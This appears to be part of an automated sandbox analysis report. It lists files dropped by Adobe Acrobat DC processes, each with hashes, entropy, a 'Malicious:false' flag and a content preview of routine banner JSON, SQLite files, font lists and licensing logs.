                                                                                          SHA-256:F48EE6E6AE6F3DCAF7E95B328037B648EF7B9CF3FD8D43F6BB80B36E7AC4EEEE
                                                                                          SHA-512:AADE5C103E760D651F1FBDB3F3CB152541887E227E78E4222A9D0F89FF90E745169BF132A463E48A0C9530832C9727405621F4F17E1FF3D14DFFAFF86584F400
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):289
                                                                                          Entropy (8bit):5.314825025954531
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJfYdPeUkwRe9:YvXKXURL8jQWRuUhU5Gg8Ukee9
                                                                                          MD5:6FA253EA135BCA0542BA7F5CAD84105D
                                                                                          SHA1:B5708D76B58600653787EA27DAF74502E8C1C075
                                                                                          SHA-256:095F407633AB19CB8663124F54A6158C82388C38BFE99F0E3E9767776FB40A23
                                                                                          SHA-512:9CDEB7325A6781213F9D9667C495D28DEA68690840E90FE58BB2939895D92F8DD64B96FE77F3F524FEE6CA880A9F8FD33DD77694E83929B8CC7C7F0CBBC5B037
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):284
                                                                                          Entropy (8bit):5.300818701222434
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJf+dPeUkwRe9:YvXKXURL8jQWRuUhU5G28Ukee9
                                                                                          MD5:A3FA0C7B99AC0CEC52C38C8217851CEF
                                                                                          SHA1:88278696BC1AF3A0FCB2144C44C99046B5F6DDE6
                                                                                          SHA-256:A1179B86418B4F323E25558935A0B3165EDF7035D8DFFFAB907DFF4AB73F0C5A
                                                                                          SHA-512:2EE8B984C86C4383F041FEE0730B0800DD9158901E97D3E51C348E25D93D601B1707580ADE2A7346EA1CDAA207193614DAC4B8DBA9850BE17D5DCAED33216151
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):291
                                                                                          Entropy (8bit):5.298270233415647
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJfbPtdPeUkwRe9:YvXKXURL8jQWRuUhU5GDV8Ukee9
                                                                                          MD5:934F122E4B164D86ADDAA356A1F13B18
                                                                                          SHA1:05DA077013A67DB3490C273A40655328C073E7CD
                                                                                          SHA-256:3A4F6E5D922348373FCF496861667BF81FC0486433CE9558A08342513DA77357
                                                                                          SHA-512:6CDC7D2B5EE85BCD4B07588713DD9096F72469A752448A806BA5746844FA45D1D096264C03557F37FEA875DC489723877CCDAFDC8DBD1A51FB7DD0896A7AD025
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):287
                                                                                          Entropy (8bit):5.3024320309807145
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJf21rPeUkwRe9:YvXKXURL8jQWRuUhU5G+16Ukee9
                                                                                          MD5:CDAC2EC930BE341C7E2661E946FA7D2D
                                                                                          SHA1:4D280C1D1C6F93B370E93B0DBB09F71224963CFC
                                                                                          SHA-256:1BDE41ACD2E4BE8D6BD90D08FB2678DE38C5FEC828DD09018D77F492C2C1133A
                                                                                          SHA-512:8B7069DB18BAC67C52B3260D84863E9CF6FC766DA7879BC4185A07CD8F6BA910762C73FC76715E1ECC2792B12F57B9B09BE6DE0DA6D9797919A686CFB9ACAB4A
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):1090
                                                                                          Entropy (8bit):5.664938943994347
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:Yv6XURYtUCamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSk:YvRRoUcBgkDMUJUAh8cvMk
                                                                                          MD5:95D1DAA759ECD5C490DBD7439606B201
                                                                                          SHA1:69C8649D266B93E2FB0BB55A1BAC40EAFCAFF07B
                                                                                          SHA-256:25EDD489E6BE96158362F19F64C486AED9B047028B04B7D2F7A925606383BD01
                                                                                          SHA-512:3689E15E2949681568E91D0EB5148EC8F1F02595E18146DD765C886523F4A73F0D2BF77F59CCE412B58432A7931F345C5D2281E1DA9B7E76184C71DB5DA9CE41
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):286
                                                                                          Entropy (8bit):5.276088808686555
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJfshHHrPeUkwRe9:YvXKXURL8jQWRuUhU5GUUUkee9
                                                                                          MD5:A9506DD997716261A92BD80C19A845C6
                                                                                          SHA1:8974E340DCB52E3C9305C344200C0FB3CB967DC3
                                                                                          SHA-256:68EECDBA31A2A86A722260EFA6FBEC39325A50BF08E4A16AA3315D63B89B4ED3
                                                                                          SHA-512:4D5067A9D26383734520EF5BEB51DF61CD2F5CB3B4B6CB1C870051AA37BB99F461E2FBD06F9FAFB955506BEC022B9F65D249F57D0D73BEAEDDFF8FD6260BCB2A
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):282
                                                                                          Entropy (8bit):5.281948311301464
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:YEQXJ2HXURc3sdGv7/Q5IRR4UhUR0YGoAvJTqgFCrPeUkwRe9:YvXKXURL8jQWRuUhU5GTq16Ukee9
                                                                                          MD5:E4F051E8B9B2D74F88FCE9E0AFD59889
                                                                                          SHA1:A42FBBEC2E87D9AA52577090058AB7C5D07D1A23
                                                                                          SHA-256:A9887781C51DED5EFC2AF0D12EF294D759FEEBB68E6E0CEF9E905352971603DE
                                                                                          SHA-512:B12DD32BA808DA77C76F298DC674015C4C803FC6CC2EBCBE2C7A164942FF436D1AEEC65BB1BA09B6A214C51BD8454A1A2C1CCAC07CE51C040C4F7D5FE64A4CFE
                                                                                          Malicious:false
                                                                                          Preview:{"analyticsData":{"responseGUID":"ddc44fcf-6f29-48f1-a3fa-7832a1ca025d","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1732894967029,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:e:e
                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                          Malicious:false
                                                                                          Preview:....
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):2817
                                                                                          Entropy (8bit):5.129771531062989
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:YhkvjTx1akXAayy/9xi4cLbcvSOjcNj0SK6+2SP2LSkCaZvOR52P92OpWuPOG:YQPrX5ihqeMLihZvQUP92Opv
                                                                                          MD5:D648BD9DECA46FAF91F28B6B2069BBD0
                                                                                          SHA1:5AC758CF62117586A996B4599AE9D8A39A118293
                                                                                          SHA-256:F65E64E62D08A419B723629D23439775166E4B2A12E519DFB01EAF3C137621CE
                                                                                          SHA-512:33DC386665F2733E22655CB3239C7775B89E4B5946B2067719EEC502BFCCDA2D0059367477F288995F32535CFE1C0F27841A5F7883097BC7215F7C6C59A4CB3C
                                                                                          Malicious:false
                                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"7d30076e842a17be99ecebdbf04e5c19","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1732716886000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"be3d5e590bcab14ad97839e0a2fbfeb8","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1732716886000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5664dd94937b7a435ee21009795fbd8b","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1732716886000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"975f626b110700f1eeda3b6feef98bfb","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1732716886000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"c9de7f3ed152ebc820c5773e219e0287","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1732716886000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"6692efb1064001a09ad7b1c8604c2518","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                          Category:dropped
                                                                                          Size (bytes):12288
                                                                                          Entropy (8bit):0.9863319905331009
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QeDXq0IcLESiAierXq0F:TVl2GL7ms67YXtrDXIcI8nXF
                                                                                          MD5:68C98AE43A88B36678F836D7B5C11B32
                                                                                          SHA1:03C50C672C0D2CF3FB1F41DD14126629E44F6F06
                                                                                          SHA-256:60F28E5979789CD5C605FAB914F79C0466C292AA2F0C9F9DB2FE8510AECE882F
                                                                                          SHA-512:B8A09169A791CAD5883EA91059954FCD4EDC8E42B957F819E6BC1748BACA8AD5A47BAAFF60B9CB202C7111DE94832ED6FC6AEA7CA52A1253740ECE33AB9F8195
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:SQLite Rollback Journal
                                                                                          Category:dropped
                                                                                          Size (bytes):8720
                                                                                          Entropy (8bit):1.3429994836418422
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:7+tZvASY9QmQ6QeDXq07cLESiAi0mY9QVqLBx/XYKQvGJF7ursw:7MZvlYXtrDX7cI8KYUqll2GL7msw
                                                                                          MD5:8D3A3C44592708F4F9107679EACBD1C0
                                                                                          SHA1:EA1A0FECECA33CC96572DFC93286935D7232AA28
                                                                                          SHA-256:F5E1A2A980BD6C0732A12892F2ED0D7152DCAF191B037EB7ADB4341EF5EC4B88
                                                                                          SHA-512:A267B982A3888AE08B6FB725711C3909EDAA3ECF0E203F057230F3E8AC6CBDFCB4E1428AD2288FBA7C33A90DA4A1226036C1994BB8862026559B514E9AB083B0
                                                                                          Malicious:false
                                                                                          Preview:.... .c.....7.*.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):66726
                                                                                          Entropy (8bit):5.392739213842091
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEg3Q2JkLxKo6wxkj0N4+3UpqYHGAXYyu:6a6TZ44ADE3Qmooo6wCAN4+3mK
                                                                                          MD5:D501C2B8ED9C24D9EC6C992B353AE25B
                                                                                          SHA1:E8E02708927E45E212B992387255B66646F77D59
                                                                                          SHA-256:2C46E79FD289C462CEF91781DE8EF0E70DFE78D426F8E94FE2AC453FB5995F06
                                                                                          SHA-512:274B7D888EB97544EE266635158F22E0CF463A35725BA34C064ED0CE91BE290A5C760F95DF4FE168A55C262FF70CAA3A646AF885AA66A3B991C4FF225234AA69
                                                                                          Malicious:false
                                                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):246
                                                                                          Entropy (8bit):3.5162684137903053
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Vn1NlH:Qw946cPbiOxDlbYnuRKON9
                                                                                          MD5:BBB87A857557DDB5C243B4AEB2509F91
                                                                                          SHA1:45CFC5E50905B7CAAEA3DEE9466DF18EEB59C1A0
                                                                                          SHA-256:422CB02DAEC591651B0CD5941DFB90BF47CEE73758B9656A841D8DF8128256C9
                                                                                          SHA-512:E4CCD13830123B56B340B18E6FB6F96319F8A8534001D8940F1D8ECE5613141C480290C15BAAAB265AD0AFE5536247108F9959D6681CCB4A731B1CACE7C7632C
                                                                                          Malicious:false
                                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.1.1./.2.0.2.4. . .0.9.:.1.4.:.4.3. .=.=.=.....
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with very long lines (393)
                                                                                          Category:dropped
                                                                                          Size (bytes):16525
                                                                                          Entropy (8bit):5.353642815103214
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                                          MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                                          SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                                          SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                                          SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                                          Malicious:false
                                                                                          Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):15114
                                                                                          Entropy (8bit):5.345466060345885
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:EWyzEU9wrZCaLdhOoP+Mf2U5YDAICzXO3wbdGBVWV8V4VsVRQimVmoAapBcBcZI9:zN2YGO+F
                                                                                          MD5:23816CCEB42A61FDDA7294774496DAF4
                                                                                          SHA1:F3C330E76810C9BEC50C6F947A5A6CF69B281F05
                                                                                          SHA-256:FD07F440DA2ACAFACC4073B1103D9EF2BEBC2BEE2A412C116163916C7ACF8BC2
                                                                                          SHA-512:8F915F3EF69761E93B711E57E813DA4AC6E070319EDDE9A5456D042FDEAB29DF87CFEE1D07E60DB9B3C73BCD6CE000B2125308CE40FA9B3CEC0693089A7EC88F
                                                                                          Malicious:false
                                                                                          Preview:SessionID=135f0118-0470-470d-b118-34212364c5d0.1732716878265 Timestamp=2024-11-27T09:14:38:265-0500 ThreadID=6456 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=135f0118-0470-470d-b118-34212364c5d0.1732716878265 Timestamp=2024-11-27T09:14:38:269-0500 ThreadID=6456 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=135f0118-0470-470d-b118-34212364c5d0.1732716878265 Timestamp=2024-11-27T09:14:38:269-0500 ThreadID=6456 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=135f0118-0470-470d-b118-34212364c5d0.1732716878265 Timestamp=2024-11-27T09:14:38:269-0500 ThreadID=6456 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=135f0118-0470-470d-b118-34212364c5d0.1732716878265 Timestamp=2024-11-27T09:14:38:270-0500 ThreadID=6456 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):29752
                                                                                          Entropy (8bit):5.4244576693330195
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:0cbgIhPcbocbAIlncb2cbwI/RcbNcbQIVvcb3fcbyIOkcbZ:fhWlA/TVZOD
                                                                                          MD5:92C721614750B4CC6C81C933478F9F12
                                                                                          SHA1:68C54CE3FE379698D60E8FC3BD7157E1913E4A0C
                                                                                          SHA-256:5D49962FFBC28F561183E6F1B8D568B5FB2D578F1792001E378E3EB765C81B2F
                                                                                          SHA-512:2D67E38AA14241C98800B56C3EA435711FA59D7432A42790C85D385048A49774A8B84D96211D337B7F390D3A12E502FA21567E204B23494BB8C110621DFCBBF3
                                                                                          Malicious:false
                                                                                          Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                          Category:dropped
                                                                                          Size (bytes):386528
                                                                                          Entropy (8bit):7.9736851559892425
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                          Malicious:false
                                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                          Category:dropped
                                                                                          Size (bytes):758601
                                                                                          Entropy (8bit):7.98639316555857
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:9WNh3P2+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:s3Pfegf121YS8lkipdjMMNB1DofjgJJg
                                                                                          MD5:B418A2E9340AA05A49F4214C098F23ED
                                                                                          SHA1:FB96EBC62066C7736E8C491BFF6C0E7DC9C65CFD
                                                                                          SHA-256:AED07BBFA6613C69EB3146771ACBF6209FC403546332348D9CAA998D9112DF63
                                                                                          SHA-512:F1EAFFB42ED03BE0D53FE753BCFA37DF512FB8CB216881256E51A2E3D833905DBEF1F569EC46E262A620206DF6745754C189E73426B2B55D56C328D761CAE485
                                                                                          Malicious:false
